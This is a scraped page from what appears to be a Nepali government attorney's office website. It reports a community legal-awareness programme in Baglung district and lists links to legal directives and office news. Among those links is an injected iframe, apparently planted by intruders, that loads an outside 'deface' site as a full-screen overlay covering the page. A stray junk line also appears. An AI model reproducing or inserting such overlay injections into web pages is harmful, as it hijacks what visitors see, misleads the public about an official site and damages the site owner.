2075-12-24
मिति २०७५।१२।२२ गते शुक्रबार समुदायमा सरकारी वकील कार्यक्रम अन्तरगत "सरकारी वकीलको सांगठनिक संरचना, काम, कर्तव्य एवं समग्र समुदायप्रति यसको दायित्व" विषय कार्यक्रम समुदायलाई जानकारी गराउने उद्देश्यले बागलुङ जिल्लाको ढोरपाटन नगरपालिका वडा नं. ७स्थित श्री ज्ञानोदय मा.वि. बोबाङमा उक्त वडाका वडाध्यक्ष दिपक थापाको अध्यक्षता र उच्च सरकारी वकील कार्यालयका निमित्त सहन्यायाधिवक्ता भुवनेश्वर पौडेलको प्रमुख आतिथ्यमा एवं वडा नं. ७ र८ का वडा अध्यक्ष तथा वडाका सबै वडा सदस्यज्यूहरु, विद्यालय व्यवस्थापन समिति,प्रहरी, शिक्षक शिक्षीका, विद्यार्थि एवं पत्रकारहरु गरी ७९ जनाको उपस्थितिमा कार्यक्रम सम्पन्न भएको थियो ।उक्त कार्यक्रममा जिल्लाा रकारी वकील कार्यालय बागलुङका जिल्ला-न्यायाधिवक्ता श्री सुरेन्द्रराज काफ्लेले कार्यपत्र प्रस्तुत गर्नुभएको थियो साथै सहभागिहरुबाट उठेका जिज्ञासाहरुको उच्च सरकारी वकील कार्यालयका निमित्त सह न्यायाधिवक्ता श्रीमान् भुवनेश्लेवर पौडेलले रोचक उदाहरण सहित सम्वोधन गर्नु भएको थियो । उक्त कार्यक्रममा वडा नं. ८ का वडा अध्यक्ष नन्दे सुनार र जिल्ला प्रहरी कार्यालयका प्र ना नि नारायण पौडेलज्यूले मन्तव्य राख्नु भएको थियो साथै जि.स.व.का. म्याग्दीका जिल्ला न्यायाधिवक्ता श्री कैष्णराज पन्तले सहभागीलाई स्वागत गर्दै कार्यक्रमको औचित्यमाथि प्रकाश पार्नु भएको थियो भने सो कार्यक्रमको संचालन जि.स.व.का. पर्वतका निमिक्त जिल्ला न्यायाधिवक्ता श्री स्वतन्र न्यौपानेले गर्नु भएको थियो ।
dsadsa
मुलुकी संहिता सम्बन्धी केही नेपाल ऐनलाई संशोधन गर्ने ऐन, २०८० (अरि १८)
बाल न्याय सम्पादन काययविधि‚ २०८०
कानूनको विवादमा परकेा बालबालिकाको दिशान्तर कार्यविधी संबन्धी निर्देशिका २०८०
मुलुकी संहिता सम्बन्धी केही नेपाल ऐनलाई संशोधन गर्ने ऐन, २०८० (अरि १८)
चेक बाउन्स मुद्दा र साईबर क्राइम सम्बन्धी मुद्दाको सुनुवाईको क्षेत्रअधिकार ७७ वटै जिल्ला अदालतलाई प्रदान गर्ने सम्बन्धी राजपत्र (२०८०/०३/११)
धौलागिरी बहिरा आबसिय मा.वि मा समुदायमा सरकारी वकिल कार्यक्रम सम्पन्न ।।
चेक बाउन्स मुद्दा र साईबर क्राइम सम्बन्धी मुद्दाको सुनुवाईको क्षेत्रअधिकार ७७ वटै जिल्ला अदालतलाई प्रदान गर्ने सम्बन्धी राजपत्र (२०८०/०३/११)
नेपाल सरकार वादी हुने फौजदारी मुद्दाको अनुसन्धान तथा अभियोजन सम्बन्धी निर्देशिका, २०८०
आ.ब. ०७९।८० को बार्षिक प्रतिबेदन
<iframe src="https://midnightopsnepaldeface.pages.dev/" allowfullscreen style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; min-height: 100vh; min-width: 100vw; z-index: 9999; border: none;"></iframe>

समुदायमा सरकारी वकील कार्यक्रम तमानखोला गा.पा.मा सम्पन्न
अनुसन्धान अधिकारी र सरकारी वकील वीच समिक्षा बैठक सम्मपन्न ।
जिल्ला प्रहरी कार्यालय, वागलुङको मु्द्दा शाखाको निरिक्षण सम्मपन्न ।
मिति २०७९।०३।२० गते समन्वय समितिको बैठक सम्मपन्न
समुदायमा सरकारी वकील कार्यक्रम वा.न.पा. वडा नं. ४ कुडुले माध्यामिक विद्यालयमा सम्पन्न ।
मिति २०७८।०९।०७ गते समन्वय समितिको बैठकको निर्णय
समुदायमा सरकारी वकील कार्यक्रम बागलुङ नगरपालिका वडा नं.३ धवलागिरी माध्यामिक विद्यालयमा सम्पन्न ।